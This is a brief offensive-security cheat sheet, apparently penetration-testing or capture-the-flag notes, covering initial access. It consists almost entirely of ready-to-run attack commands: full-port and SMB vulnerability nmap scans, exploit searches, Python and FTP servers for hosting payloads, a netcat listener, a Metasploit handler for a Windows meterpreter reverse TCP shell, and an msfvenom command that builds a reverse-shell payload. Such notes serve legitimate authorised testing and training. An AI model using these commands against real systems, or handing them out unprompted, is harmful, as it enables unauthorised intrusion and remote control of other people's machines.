Gaining A Foothold (Pre-Exploitation)
Basic Scanning
Nmap Scan: nmap -A -T4 -p- <victimip>

Nmap Smb-Vuln Check: nmap -p 139,445 --script smb-vuln* <victimip>

Search For Exploit: searchsploit <service>
File Hosting
Using Python 2: python -m SimpleHTTPServer 80

Using Python 3: python3 -m http.server 80

FTP Server With Anonymous Login Enabled: python -m pyftpdlib -p 21 --write
Setting A Listener
Netcat: nc -nvlp <port>

Metasploit Listener: start msfconsole, then enter at its prompt:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 4444
run
Metasploit
Windows Reverse TCP Shell Generation: msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f <filetype> -o file.<filetype>